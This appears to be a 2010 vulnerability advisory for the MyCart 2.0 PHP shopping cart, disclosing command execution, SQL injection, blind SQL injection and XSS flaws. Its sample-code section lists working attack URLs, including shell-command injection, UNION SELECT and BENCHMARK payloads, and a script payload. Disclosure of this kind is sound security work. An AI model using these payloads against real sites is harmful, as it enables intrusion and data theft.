扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 |
MyCart 2.0 Multiple Remote Vulnerabilities NameMyCart Vendorhttp://open.appideas.com Versions Affected 2.0 AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-10-27 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION ________________________ MyCartisacollectionofPHP scripts that setup the backbone of a shopping cart or on-line ordering system. II. DESCRIPTION _______________ Many parameters are not properly sanitisedbeforebeing used in SQL queries and from some PHP's functions. III. ANALYSIS _____________ Summary: A) Multiple Remote Command Execution B) Multiple SQL Injection C) Multiple Blind SQL Injection D) XSS A) Multiple Remote Command Execution ____________________________________ ReadingtheREADMEfile youmaynotice the following lines: If you can't make anything work, change the require(...) statement in the files of the admin directory to read: require("../Cart.php"); In the "admin" directorythereisafilenamed uploadItem.php with the following content: <? require("Cart.php"); Root(); exec("mv $image '$WebRoot/images/".$ItemID.".jpg'"); Header("Location: $Relative/admin/index.php"); ?> Changingrequire("Cart.php")inrequire("../Cart.php") is possibile to execute remote commands by injecting them using the $image variable. The same securityflaw is presentalso in removeItemResponse.php andin removeCategoryResponse.php via SQL Injection. Successful exploitation requires that register_globlas is set to Off. For removeCategoryResponse.php,successfulexploitation requires that magic_quotes_gpc is set to Off. B) Multiple SQL Injection _________________________ Manyparametersare not properly sanitised before being used in SQL queries.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that magic_quotes_gpc is set to Off. C) Multiple Blind SQL Injection _______________________________ Manyparametersare not properly sanitised before being used in SQL queries.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that magic_quotes_gpc is set to Off. D) XSS ______ Input passed to the "ON" parameter in receipt.php isnot properly sanitised before being returned to the user.This can be exploitedtoexecute arbitraryHTMLand script code in a users browser session in context of an affected site. IV. SAMPLE CODE _______________ A) Multiple Remote Command Execution http://site/path/admin/uploadItem.php?image=.;; http://site/path/admin/removeItemResponse.php?ItemID=.; ping localhost ; http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' UNION SELECT '; ping localhost ;'%23 B) Multiple SQL Injection http://site/path/description.php?II=-1' UNION SELECT 1,2,3,4,5,6,7%23&UID=VALID UID HERE http://site/path/receipt.php?BI=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23 http://site/path/admin/searchReceiptsResponse?criteria=order&OrderNumber=-1' UNION SELECT 1,2,3,4,5,6%23 http://site/path/admin/searchReceiptsResponse?criteria=name&User=%25' UNION SELECT 1,2,3,4,5,6%23 http://site/path/admin/searchReceiptsResponse?Year=%25' UNION SELECT 1,2,3,4,5,6%23 http://site/path/admin/searchReceiptsResponse?Month=%25' UNION SELECT 1,2,3,4,5,6%23 http://site/path/admin/searchReceiptsResponse?Day=%25' UNION SELECT 1,2,3,4,5,6%23 C) Multiple Blind SQL Injection http://site/path/index.php?UID=' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23 http://site/path/removeItem.php?CartItemsID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23 http://site/path/removeItemResponse?ItemID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23 http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23 D) XSS http://site/path/receipt.php?ON=<script>alert('xss');</script> V. FIX ______ No fix. |
体验盒子
